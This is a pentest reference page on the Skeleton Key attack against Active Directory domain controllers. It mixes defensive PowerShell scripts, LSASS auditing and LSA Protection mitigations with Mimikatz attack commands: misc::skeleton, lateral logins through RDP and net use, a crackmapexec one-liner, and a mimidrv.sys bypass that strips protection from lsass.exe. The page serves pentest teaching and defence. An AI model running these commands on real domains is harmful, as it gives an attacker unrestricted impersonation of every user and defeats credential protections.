Pentest Everything

Skeleton Key Attack

Last updated 2 years ago

Description

The Skeleton Key attack uses malware injected into the LSASS process on a Domain Controller to create a master password. That master password is accepted for any authentication request on the domain, allowing an attacker to log in as any user on any system in the domain with the same password.

Prerequisites

  • Attacker must have obtained Domain Admin rights

  • Mimikatz running on a Domain Controller

  • For the most effective use, every Domain Controller should be patched; however, this is not a hard requirement.

  • Rebooting a Domain Controller removes the malware, since the patch is not persistent.

Exploitation

After Mimikatz has been dropped onto a Domain Controller and executed with Domain Admin privileges, the following two commands perform the attack.

privilege::debug #Expect "Privilege '20' OK", confirming debug rights.
misc::skeleton

Once the above confirms that the lsass.exe process has been patched, the password mimikatz can be used to authenticate as any user in the domain.

Usage Examples

RDP

RDP can be used to authenticate with the Skeleton Key password and reach high-level accounts from a GUI. Below, the CEO's desktop is accessed directly.

xfreerdp /v:<IP> /u:<User> /p:<mimikatz> /d:<Domain> #Syntax
xfreerdp /v:10.10.10.9 /u:CEO /p:mimikatz /d:security.local

Mapping Remote Shares

net use <DriveLetter:> \\<IP>\<Share> /user:<User> mimikatz #Syntax
net use Z: \\10.10.10.9\ADMIN$ /user:Administrator mimikatz

Crackmapexec

With valid Domain Admin credentials, crackmapexec can run its mimikatz module with the Skeleton Key command directly against a target Domain Controller.

crackmapexec smb 10.10.10.10 -u 'Administrator' -p 'Password123!' -M mimikatz -o COMMAND='misc::skeleton'

Detection

Enable audit mode for Lsass.exe (Single System)

Edit the registry as follows:

  • Navigate to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.

  • Set the value AuditLevel=dword:00000008.

  • Restart the system.

Enable audit mode for Lsass.exe (Group Policy)

  1. Expand Computer Configuration, expand Preferences, and then expand Windows Settings.

  2. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears.

  3. In the Hive list, click HKEY_LOCAL_MACHINE.

  4. In the Key Path list, browse to SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.

  5. In the Value name box, type AuditLevel.

  6. In the Value type box, click to select the REG_DWORD.

  7. In the Value data box, type 00000008.

  8. Click OK.

For the GPO to take effect, the change must be replicated to all domain controllers.

After making the required changes, the event logs on the relevant systems can be monitored for plug-ins and drivers loaded by lsass.exe.

Analyze the results of Event 3033 and Event 3063.

After this, you may see these events in Event Viewer under Microsoft-Windows-CodeIntegrity/Operational:

  • Event 3033: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the Microsoft signing level requirements.

  • Event 3063: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the security requirements for Shared Sections.
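The single-system detection steps above, combined into one script as an added example (this is not code from the original page). It sets the AuditLevel value, then queries the Code Integrity operational log for Events 3033 and 3063. The function names are my own; the registry path, value and event IDs are those given on the page. Run it from an elevated PowerShell session on the Domain Controller.

```powershell
# Added example, not from the original page: enable LSASS audit mode on one
# system and review the Code Integrity events it produces after the restart.
# Function names are assumptions; the key, value and event IDs are from the page.

$IfeoLsass = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe'

function Enable-LsassAuditMode {
    # Create the IFEO key for LSASS.exe if it is missing, then set AuditLevel = 8.
    # Audit mode only logs plug-ins/drivers that lsass.exe loads; it does not block them.
    if (-not (Test-Path -Path $IfeoLsass)) {
        New-Item -Path $IfeoLsass -Force | Out-Null
    }
    New-ItemProperty -Path $IfeoLsass -Name 'AuditLevel' -PropertyType DWord -Value 8 -Force | Out-Null
    # Return the configured value (8). A restart is required before auditing starts.
    (Get-ItemProperty -Path $IfeoLsass -Name 'AuditLevel').AuditLevel
}

function Get-LsassAuditEvents {
    # Pull Event 3033 (Microsoft signing level not met) and Event 3063 (Shared
    # Sections requirement not met) from the Code Integrity log for the last $Days days.
    param([int]$Days = 7)

    $filter = @{
        LogName   = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id        = 3033, 3063
        StartTime = (Get-Date).AddDays(-$Days)
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{
            Name       = 'Summary'
            Expression = {
                # Collapse whitespace and trim long messages so the table stays readable
                $m = $_.Message -replace '\s+', ' '
                if ($m.Length -gt 160) { $m.Substring(0, 160) + '...' } else { $m }
            }
        }
}

# Usage: enable auditing, restart the system, then review the events periodically.
Enable-LsassAuditMode
Get-LsassAuditEvents -Days 30 | Format-Table -AutoSize -Wrap
```

On a Domain Controller these two events should be rare. Any 3033 or 3063 entry naming lsass.exe that you cannot tie to a known LSA plug-in is worth treating as a potential LSASS tampering attempt and investigating immediately, since a Skeleton Key patch leaves no trace on disk and disappears on reboot.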

Mitigation

LSA Protection

LSASS can be run as a protected process (LSA Protection, also known as RunAsPPL), which helps prevent this kind of attack. With protection enabled, any plug-in or driver loaded into the LSASS process must carry a valid Microsoft signature. A caveat is that if malware is able to load code into the kernel, the protection is nullified.

Perform the following registry changes to enable LSA Protection:

  • Navigate to HKLM\SYSTEM\CurrentControlSet\Control\Lsa.

  • Set the value "RunAsPPL"=dword:00000001.

  • Restart the computer.

LSA plug-ins which are NOT compatible with LSA Protection Mode will NOT function after enabling the mode.

To check if LSA Protection is enabled we can check for Event ID 12 from Wininit under the System logs in Event Viewer.

Multi-factor authentication

Skeleton Key attacks rely on single-factor (password-only) authentication on the network during the post-exploitation stage. Multi-factor implementations such as smart card authentication can help to mitigate this attack.

Application Whitelisting

Application whitelisting can be used to stop unapproved applications from being executed on the Domain Controller. AppLocker would be an appropriate solution in this circumstance.

Protecting Domain Administrator accounts

Ensuring Domain Admin accounts are not compromised mitigates this attack, as Domain Admin privileges are a hard requirement for performing a Skeleton Key attack.

Protection Bypass

The image below shows an attempt to access the lsass.exe process, extract clear-text passwords and run a Skeleton Key attack. As we can see, this has not been successful since the RunAsPPL registry change described in the LSA Protection mitigation section was applied.

We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled
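The LSA Protection registry change from the mitigation section and the RunAsPPL check above, combined into one script as an added example (this is not code from the original page). It sets RunAsPPL, verifies the configured value, and confirms from the Wininit Event ID 12 in the System log that LSASS actually started as a protected process after the restart. It also lists recent kernel driver service installations (Service Control Manager Event 7045), because, as the page's bypass section notes, a loaded kernel driver such as mimidrv.sys is what strips the protection; that last check and the function names are my own assumptions. Run it from an elevated PowerShell session on the Domain Controller.

```powershell
# Added example, not from the original page: enable LSA Protection (RunAsPPL) and
# verify it from both the registry and the Wininit Event ID 12 described on the page.
# The 7045 kernel-driver check and the function names are assumptions of this example.

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Enable-LsaProtection {
    # Same effect as "RunAsPPL"=dword:00000001; takes effect only after a restart.
    Set-ItemProperty -Path $LsaKey -Name 'RunAsPPL' -Type DWord -Value 1
    (Get-ItemProperty -Path $LsaKey -Name 'RunAsPPL').RunAsPPL   # expect 1
}

function Test-LsaProtection {
    # The registry says what is configured; Event 12 says what happened at boot.
    $value = (Get-ItemProperty -Path $LsaKey -Name 'RunAsPPL' -ErrorAction SilentlyContinue).RunAsPPL

    $event = Get-WinEvent -FilterHashtable @{
                 LogName      = 'System'
                 ProviderName = 'Microsoft-Windows-Wininit'
                 Id           = 12
             } -MaxEvents 1 -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RunAsPPL             = $value
        ConfiguredInRegistry = ($value -eq 1)
        ConfirmedByEvent12   = [bool]$event
        LastEvent12          = if ($event) { $event.TimeCreated } else { $null }
        Note                 = if ($value -eq 1 -and -not $event) {
                                   'Configured but not yet active: restart required'
                               } else { '' }
    }
}

function Get-RecentKernelDriverInstalls {
    # Assumption of this example: Event 7045 ("A service was installed in the system")
    # records new driver services; a kernel driver appearing on a DC outside of a
    # change window is how a RunAsPPL bypass like mimidrv.sys would show up.
    param([int]$Days = 7)

    Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7045
        StartTime    = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'kernel mode driver' } |
        Select-Object TimeCreated, @{
            Name       = 'Summary'
            Expression = { ($_.Message -replace '\s+', ' ') }
        }
}

# Usage: enable, restart, then verify and keep an eye on new kernel drivers.
Enable-LsaProtection
Test-LsaProtection | Format-List
Get-RecentKernelDriverInstalls -Days 30 | Format-Table -AutoSize -Wrap
```

The point of checking both sources is that a RunAsPPL value of 1 only proves intent: until Event 12 has been logged after a reboot, LSASS is still running unprotected. Pairing that with the 7045 driver check covers the caveat from the mitigation section, since protection that is active can still be removed by anything that gets code into the kernel.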

This can be bypassed, however, by using the mimidrv.sys driver file, which is included as a separate file with Mimikatz.

The mimidrv.sys driver file needs to exist in the same directory as mimikatz.exe.

The driver is loaded by running the command !+ in Mimikatz. After doing so, the following command can be executed to protect the mimikatz.exe process.

!processProtect /process:mimikatz.exe

The same command with the /remove flag strips process protection from a process such as lsass.exe.

!processprotect /process:lsass.exe /remove

After doing so it is possible to bypass LSA Protection, as shown below where the command misc::skeleton runs and completes successfully.

References:

https://riccardoancarani.github.io/2020-08-08-hunting-for-skeleton-keys/
https://ldapwiki.com/wiki/LSA%20Protection
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
https://itm4n.github.io/lsass-runasppl/
https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5
https://posts.specterops.io/mimidrv-in-depth-4d273d19e148